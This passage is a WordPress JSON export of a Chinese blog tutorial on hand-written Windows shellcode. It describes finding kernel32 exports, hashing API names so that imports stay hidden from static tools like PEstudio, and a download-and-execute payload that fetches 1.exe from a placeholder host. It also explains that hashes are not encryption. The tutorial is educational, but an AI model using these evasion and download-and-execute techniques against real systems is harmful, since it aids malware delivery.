src=\"https:\/\/blog.73007300.xyz\/?p=114&#038;embed=true#?secret=d2QqLd5voe#?secret=c48HZj70Dl\" data-secret=\"c48HZj70Dl\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>\u7528PEstudio\u67e5\u770b\u7ec8\u6781\u7248\u7f16\u8bd1\u51fa\u7684\u7a0b\u5e8f\uff0c\u53ef\u4ee5\u770b\u5230Import 
table\u91cc\u6ca1\u6709\u8bb0\u5f55\u76f8\u5173\u7684\u51fd\u6570\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"605\" height=\"496\" src=\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/01\/image-31.png\" alt=\"\" class=\"wp-image-167\"\/><\/figure>\n\n\n\n<p>\u4ece\u800c在静态查看导入表时更隐蔽。但要注意反面效果：一个几乎没有导入项、却能联网下载并执行文件的 EXE，本身就是 PEstudio 这类工具和沙箱的可疑指标（导入表异常稀少），再加上前面的 PEB 遍历和 API 散列模式，仍然很容易被启发式或行为检测识别。<\/p>\n\n\n\n<p> \u8fd9\u91cc\u63d2\u4e00\u53e5\uff0c\u524d\u4e00\u9635\u5b50\u542c\u5230\u67d0\u4e2a\u540c\u4e8b\u8bf4\u4e86\u4e00\u53e5\u8bdd\u201cMD5\u52a0\u5bc6\u7b97\u6cd5\u201d\uff0c\u8fd9\u91cc\u8981\u8bf4\u660e\u4e00\u4e0b：MD5、MD4、SHA-256 都是密码学 Hash（消息摘要）算法，不是加密算法。区别在于加密有密钥、持有密钥就能解密还原明文，而 Hash 没有密钥、输出定长、设计上是单向不可逆的，用途是完整性校验、数字签名、口令存储等。本文 shellcode 里用的 ror 7 加法散列则只是非密码学的 API 名称查找散列，和 MD5 这类算法不在一个安全级别上。另外 MD4 和 MD5 的抗碰撞性早已被攻破，新项目不应再把它们用于安全目的。<br> \u5410\u69fd\u4e00\u4e0b\uff0c\u52a0\u5bc6\u89e3\u5bc6\u771f\u7684\u662f\u4e0d\u820d\u5f97\u5728\u4ee3\u7801\u91cc\u5199\u5907\u6ce8\uff0c\u770b\u7684\u7d2f\u6b7b\u4eba\u4e86\u3002\u771f\u4e0d\u9002\u5408\u65b0\u624b\u770b\u3002 <\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u672c\u6587\u63a5\u4e0a\u4e00\u7bc7\uff1a \u770b\u5b8c\u7406\u8bba\uff0c\u63a5\u7740\u8981\u6765\u5199\u4ee3\u7801\u5b9e\u8df5\u4e00\u4e0b\u3002 \u8981\u5b9e\u73b0\u7684\u529f\u80fd\u662f\u901a\u8fc7Inline Assembly \u6253\u5f00 C:\\1.exe \u5148\u8981\u83b7\u53d6kernel32.dll\u5728\u5185\u5b58\u4e2d\u7684\u57fa\u5740\uff0c\u56e0\u4e3akernel32\u4e2d\u6709\u6211\u9700\u8981\u7684\u51fd\u6570\uff0c\u6709\u4e24\u79cd\u65b9\u6cd5\u3002 \u7b2c\u4e00\u79cd\u65b9\u6cd5\uff08https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html\uff09\uff1a \u7b2c\u4e8c\u79cd\u65b9\u6cd5\uff08\u52a0\u5bc6\u89e3\u5bc6\u91cc\u7684\u65b9\u6cd5\uff09\uff1a \u672c\u6587\u91c7\u7528\u7b2c\u4e00\u79cd\u65b9\u6cd5\u3002 \u57fa\u7840\u7248ShellCode: 
\u7a0b\u5e8f\u5c31\u662f\u627e\u5230kernel32.dll \u7136\u540e\u627e\u5230\u5bfc\u51fa\u8868\uff0c\u904d\u5386\u627e\u5230Function name Table \u4e2dWinExec\u7684\u4f4d\u7f6e\uff0c \u901a\u8fc7\u8fd9\u4e2a\u4f4d\u7f6e\u627e\u5230Ordinal Table\u4e2d\u6307\u5b9a\u7684index\uff0c\u901a\u8fc7\u8fd9\u4e2aindex\u5728 Address Table\u627e\u5230 WinExec\u7684\u5730\u5740\uff0c\u7136\u540e\u4f20\u53c2\uff0ccall\u8fd9\u4e2a\u5730\u5740\u3002 \u8fdb\u9636\u7248ShellCode: \u8fdb\u9636\u7248ShellCode\u7528\u4e86\u52a0\u5bc6\u89e3\u5bc6\u4e2d\u7684Hash\u7b97\u6cd5\u627eFunction Name\uff0c\u9632\u6b62\u88ab\u68c0\u6d4b\u5230\u3002 \u7ec8\u6781\u7248\uff08\u52a0\u5bc6\u89e3\u5bc6\u7248\uff09 \u7a0b\u5e8f\u7684\u529f\u80fd\u662f\u4ecehttp:\/\/ll.com\/1.exe\u4e0b\u8f7d\u5e76\u6267\u884c\u3002ll.com\u53ef\u4ee5\u5728etc\\hosts\u91cc\u505a\u6620\u5c04\u3002 \u53ea\u662f\u6838\u5fc3\u4ee3\u7801\u7684\u601d\u8def\u548c\u52a0\u5bc6\u89e3\u5bc6\u4e00\u6837\uff0c\u533a\u522b\u662f\u6211\u628a\u6570\u636e\u76f4\u63a5\u5728\u6c47\u7f16\u4ee3\u7801\u91ccpush\u4e86\u3002 \u5148\u83b7\u53d67\u4e2aKernel32\u7684\u51fd\u6570\u5730\u5740\uff0c\u518d\u83b7\u53d6Urlmon\u7684\u51fd\u6570\u5730\u5740\uff0c\u653e\u5230\u6808\u91cc\uff0c\u6700\u540e\u901a\u8fc7ebp\u8c03\u7528\u6240\u9700\u8981\u7684\u51fd\u6570\u3002 \u7f16\u8bd1\uff08MinGW\uff09\uff1a \u5173\u4e8e\u8fd9\u91cc\u7684Hash\u7b97\u6cd5\u53ef\u4ee5\u53c2\u8003\u8fd9\u7bc7\uff1a \u7528PEstudio\u67e5\u770b\u7ec8\u6781\u7248\u7f16\u8bd1\u51fa\u7684\u7a0b\u5e8f\uff0c\u53ef\u4ee5\u770b\u5230Import table\u91cc\u6ca1\u6709\u8bb0\u5f55\u76f8\u5173\u7684\u51fd\u6570\u3002 \u4ece\u800c\u66f4\u52a0\u9690\u853d\u3002 
\u8fd9\u91cc\u63d2\u4e00\u53e5\uff0c\u524d\u4e00\u9635\u5b50\u542c\u5230\u67d0\u4e2a\u540c\u4e8b\u8bf4\u4e86\u4e00\u53e5\u8bdd\u201cMD5\u52a0\u5bc6\u7b97\u6cd5\u201d\uff0c\u8fd9\u91cc\u8981\u8bf4\u660e\u4e00\u4e0bMD5,MD4,SHA256\u90fd\u5c5e\u4e8eHash\u7b97\u6cd5\uff0cHash\u7b97\u6cd5\u662f\u7528\u6765\u505a\u5feb\u901f\u67e5\u8be2\u7684\uff0c\u7531\u4e8e\u7b97\u6cd5\u7684\u7279\u6027\uff0c\u51e0\u4e4e\u4e0d\u53ef\u9006\uff0c\u6240\u4ee5\u4e0d\u80fd\u8bf4\u662f\u52a0\u5bc6\u7b97\u6cd5\u3002 \u5410\u69fd\u4e00\u4e0b\uff0c\u52a0\u5bc6\u89e3\u5bc6\u771f\u7684\u662f\u4e0d\u820d\u5f97\u5728\u4ee3\u7801\u91cc\u5199\u5907\u6ce8\uff0c\u770b\u7684\u7d2f\u6b7b\u4eba\u4e86\u3002\u771f\u4e0d\u9002\u5408\u65b0\u624b\u770b\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,2],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/160"}],"collection":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=160"}],"version-history":[{"count":7,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/160\/revisions"}],"predecessor-version":[{"id":173,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/160\/revisions\/173"}],"wp:attachment":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=160"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=160"},{"taxonomy":"post_tag","embeddable":true,"href":
"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}